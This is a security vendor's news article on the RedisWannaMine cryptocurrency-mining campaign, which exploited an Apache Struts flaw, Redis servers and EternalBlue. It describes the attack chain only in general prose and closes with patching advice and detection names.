RedisWannaMine Cryptocurrency-Mining Operation Found Targeting Servers with EternalBlue

Security researcher Nadav Avital uncovered a cryptocurrency-mining operation they named RedisWannaMine, which targets database and application servers by exploiting the notorious EternalBlue.

RedWannaMine exploits CVE-2017-9805, a remote code execution (RCE) vulnerability in Apache Struts. It’s an open-source framework used for developing Java web applications and is reportedly used by at least 65% of Fortune 100 companies. Operators of RedisWannaMine exploit this security flaw to run a shell command to download cryptocurrency-mining malware.

[Security 101: The Impact of Cryptocurrency-Mining Malware]

When the researchers followed operation’s trail, they also found a shell script file responsible for:

  • Downloading cryptocurrency-mining malware
  • Gaining persistence through new entries in crontab, a Linux-based time-based job/task scheduler
  • Getting remote access to the affected system through a new Secure Shell (SSH) key entry

RedWannaMine’s attack chain also involves scanning vulnerable Redis servers (an open-source framework mainly used for databases) via port 6379 and infecting them with cryptocurrency-mining malware. It also uses a transmission control protocol (TCP) scanner to search for open port 445, the default port of Server Message Block (SMB). It then exploits EternalBlue to drop the miner and further spread.

[From TrendLabs Security Intelligence: Will Cryptocurrency-Mining Malware Be the Next Ransomware?]

RedisWannaMine isn’t the first to employ this technique or target Apache. Last February, Trend Micro uncovered malicious Monero miners exploiting two vulnerabilities in Apache CouchDB. There was also a fileless cryptocurrency-mining malware last year that used EternalBlue for propagation and abused the Windows Management Instrumentation (WMI) command-line tool for persistence. Nearly four months before it, the Monero-mining Adylkuzz emerged to cash in on the WannaCry outbreak.

Indeed, these types of malware are becoming as widespread as the cryptocurrencies themselves. In fact, cryptocurrency mining was the most detected network event in devices connected to home routers, peaking at over 23 million in the third quarter of 2017.
Trend Micro’s proactive solutions against fileless cryptocurrency-mining malware
(click to enlarge)

Given that RedWannaMine targets servers, it could significantly affect organizations that use them. Apart from increasing power consumption, it can also risk disruption in operations as the malware steals resources needed to mine for cryptocurrencies.

More importantly, RedisWannaMine also highlights the real-life significance of patching and importance of adopting best practices for system administrators responsible for watching over their company’s online perimeter. This is particularly true for organizations that build, use, and deploy their own web applications, as they need to integrate security at each level of their application’s lifecycle. Just like other threats that weaponized potent exploits, one vulnerable device is all it takes to affect all systems connected to it.

Trend Micro™ Deep Security™, Vulnerability Protection, and TippingPoint provide virtual patching that protects endpoints from threats that abuse unpatched vulnerabilities. Trend Micro’s solutions for CVE-2017-9805 are in this article. Trend Micro's detections for the malicious miners are: Coinminer_MALXMR.AB-WIN32, ELF_SETAG.TNX, and Suspicious_GEN.F47V0305.


Like it? Add this infographic to your site:
1. Click on the box below.   2. Press Ctrl+A to select all.   3. Press Ctrl+C to copy.   4. Paste the code into your page (Ctrl+V).

Image will appear the same size as you see above.